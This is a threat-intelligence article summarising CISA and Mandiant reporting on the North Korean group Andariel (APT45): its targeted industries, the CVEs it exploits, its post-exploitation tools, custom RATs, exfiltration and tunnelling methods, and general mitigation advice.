Andariel Threat Group Exploits Multiple CVEs to Compromise Global Industries
Andariel Threat Group Exploits Multiple CVEs to Compromise Global Industries
North Korean threat actor Andariel, also known as APT45, Onyx Sleet, DarkSeoul, Silent Chollima, and Stonefly/Clasiopa, has been identified as engaging in cyber espionage activities associated with the Democratic People’s Republic of Korea (DPRK)’s Reconnaissance General Bureau (RGB) 3rd Bureau. The U.S. Cybersecurity and Infrastructure Security Agency (CISA) and Mandiant have each reported on the cyber espionage activities of the North Korean threat actor Andariel operating from Pyongyang and Sinuiju. Andariel targets a wide range of business verticals, including agriculture, aerospace, biotechnology, chemical, construction, defense, education, energy, engineering, entertainment, financial, healthcare, insurance, legal, manufacturing, nuclear, pharmaceutical, retail, technology, telecommunications, transportation, and utilities. The primary objective of these cyber operations is to obtain sensitive and classified technical information to advance the regime’s military and nuclear programs.
CISA's findings outline a range of sensitive information targeted across several industries, including defense, aerospace, nuclear, and engineering. In the defense sector, they focus on data related to tanks, combat vehicles, naval vessels, as well as modeling and simulation services. In aerospace, their interests lie in fighter jets, UAVs, missile systems, satellites, and various radar technologies. For the nuclear industry, they seek information on uranium processing, waste management, nuclear power plants, and government research facilities. In engineering, Andariel targets shipbuilding, robotics, 3D printing technologies, and various manufacturing processes. "The information targeted—such as contract specifications, bills of materials, project details, design drawings, and engineering documents—has military and civilian applications and leads the authoring agencies to assess one of the group’s chief responsibilities as satisfying collection requirements for Pyongyang’s nuclear and defense programs," as reported by CISA.
The incorporation of ransomware is a financial supporting avenue, particularly when used against healthcare entities located in the United States. Reporting from CISA and Mandiant links the use of Maui ransomware by North Korean state-sponsored actors. Andariel gains initial access through exploitation of known vulnerabilities, researching available CVEs to exploit targets such as CVE-2021-44228 (Apache Log4j), CVE-2022-22965 (Spring4Shell), CVE-2022-30190 (Microsoft Windows Support Diagnostic Tool), CVE-2023-34362 (MOVEIt), and CVE-2023-3519 (Citrix NetScaler). Once access is obtained, they conduct system discovery and run enumeration techniques, establish persistence using Scheduled Tasks, and perform credential using tools like Mimikatz. They deploy custom malware implants, remote access tools (RATs), and open-source tools for execution, lateral movement, and data exfiltration. Common tools used by Andariel include Python, Mimikatz, AdFind, PLINK, ProcDump, and WinSCP, with execution of native commands involving netstat, curl, systeminfo, and findstr. Among living-off-the-land techniques, tools leveraged include PowerShell, Windows Command Shell, Visual Basic, and Scheduled Tasks. To facilitate lateral movement, Andariel utilizes Remote Desktop Protocol (RDP), SMB/Windows Admin Shares, and SSH.
The group also leverages custom malware and remote access tools (RATs) to maintain their foothold and exfiltrate data. Custom tools such as AndarLoader, NukeSped, MagicRAT, TigerRAT, and Valefor/VSingle provide Andariel with the capability to execute arbitrary commands, keylogging, screenshots, file listing, and capture network connections. These tools allow them to effectively monitor and control compromised systems. Data exfiltration is typically conducted using RAR archives, which are then transferred to remote servers using tools like PuTTY and WinSCP. The actors also utilize cloud storage services to exfiltrate data, further complicating detection and attribution efforts.
Andariel's command and control infrastructure utilizes techniques like tunneling through 3Proxy, PLINK, and Stunnel to evade detection and maintain connectivity with compromised systems. This allows them to conduct operations despite network defenses like Network Address Translation (NAT) and web proxies. The actors conduct operations with a high degree of adaptability, frequently changing tactics to maintain access and evade detection, utilizing web shells for persistent access. Defense evasion is achieved through advanced packing techniques using VMProtect and Themida, leveraging living-off-the-land techniques, and by employing legitimate tools in ways that blend malicious actions with normal system operations.
To mitigate the threats posed by Andariel, it is crucial for organizations to apply patches for known vulnerabilities promptly, monitor suspicious activities on endpoints, and implement strong authentication and remote access controls. Continuous monitoring and threat intelligence are essential to stay ahead of such advanced threat actors, as they persistently adapt their strategies to exploit emerging vulnerabilities and maintain a foothold in targeted networks. Mandiant warns, "As the country has become reliant on its cyber operations as an instrument of national power, the operations carried out by APT45 and other North Korean cyber operators may reflect the changing priorities of the country’s leadership."